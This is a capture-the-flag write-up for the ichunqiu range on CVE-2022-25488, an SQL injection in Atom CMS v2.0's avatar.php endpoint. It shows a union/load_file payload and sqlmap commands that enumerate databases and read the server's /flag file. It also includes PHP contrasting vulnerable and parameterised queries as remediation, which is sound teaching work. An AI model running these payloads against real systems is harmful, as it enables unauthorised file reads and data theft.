Chunqiu Cloud Mirror (ichunqiu range): CVE-2022-25488 (SQL error-based injection)

Table of contents

1. Topic

2. Reading the flag with sqlmap


1. Topic

Description:

Atom CMS v2.0 has a SQL injection vulnerability in the /admin/ajax/avatar.php page.

On to the challenge.

The target first shows a Not Found page, which at first looked like the range was not up:


The page we actually want is /admin/ajax/avatar.php.

Accessing it returns a blank page:

View the page source:

Test the injection point with ?id=1

The source changes:

Try id=1'

The source does not change:

Verify again with id=1 and 1=1

That confirms a string-type injection.

Since the flag is not in a database name, we can skip enumeration and use error-based injection directly.

SQL error-based injection:

http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=-1 union (select load_file('/flag'))#

id=1 and 1=2 can also be used: the flag then shows up in the SQL syntax error message returned for id.
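The root cause behind both techniques above, as an added example that is not Atom CMS's own code: a lookup endpoint that concatenates id into the query, next to a hardened version that validates and binds it. The table and column names (users, avatar) and the database credentials are assumptions.

```php
<?php
// Added example, not Atom CMS source. Assumed schema: table `users` with
// integer column `id` and string column `avatar`.
declare(strict_types=1);

// Vulnerable: the id parameter is spliced into the SQL text, so a crafted id
// rewrites the statement (union, error-based, load_file(), ...).
function avatar_vulnerable(mysqli $db, array $get): ?string
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT avatar FROM users WHERE id = '" . $id . "'";
    $res = $db->query($sql);            // a syntax error surfaces here
    $row = $res ? $res->fetch_assoc() : null;
    return $row['avatar'] ?? null;
}

// Hardened: id must be a positive integer and is bound as a parameter, so it
// is never parsed as SQL; anything else is rejected before reaching MySQL.
function avatar_hardened(mysqli $db, array $get): ?string
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT avatar FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row['avatar'] ?? null;
}

// Raise driver errors as exceptions and keep their text out of the response:
// the error-based technique in the writeup depends on MySQL messages being
// echoed back to the client.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
    // placeholder credentials, not the range's real ones
    $db = new mysqli('localhost', 'atom', 'PLACEHOLDER_PASSWORD', 'atomcms');
    echo avatar_hardened($db, $_GET) ?? '';
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage());        // server-side log only
    http_response_code(500);
}
```

The load_file('/flag') read also only works because the CMS's database account holds the FILE privilege and secure_file_priv does not restrict it; running the web application under a least-privilege account closes that path even if an injection remains.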


2. Reading the flag with sqlmap

With id=1 as the injection point, enumerate the databases:

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch -dbs

The databases are listed, but there is no flag table.

Because the default flag on the ichunqiu range sits in the root directory, we can read the /flag file directly:

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch --file-read "/flag" --dbms mysql

When it finishes, sqlmap saves the file under its output directory:

Check it:


flag{6d6a2570-99f2-402f-aeb2-bb9b6da68247}

Source: blog.csdn.net/m0_65712192/article/details/130296485